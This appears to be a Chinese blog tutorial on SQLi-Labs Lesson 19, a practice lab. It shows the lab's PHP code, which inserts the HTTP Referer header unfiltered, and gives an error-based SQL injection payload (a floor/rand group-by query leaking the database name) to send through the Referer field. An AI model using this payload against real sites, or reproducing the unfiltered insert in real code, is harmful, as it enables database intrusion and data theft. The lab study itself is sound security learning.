SQLi Labs Lesson19

本文介绍了一个通过Referer字段进行SQL注入的例子。在一个未对HTTP Referer字段进行过滤的登录页面中,利用特定构造的SQL语句,实现了对数据库的注入攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Lesson - 19

POST - Header Injection - Referer field - Error based


首先进入欢迎界面:


查看后台php源代码:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

对username , password都进行了过滤,和上节相同。

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);

对Referer没有进行过滤就insert进数据库中。

所以可以利用Referer进行注入。


用TamperData在Referer后加上:

' or (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1) , '1')#

提交表单,如无成功,多次重复后,结果如图所示:


用updatexml函数,可达到相同效果。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值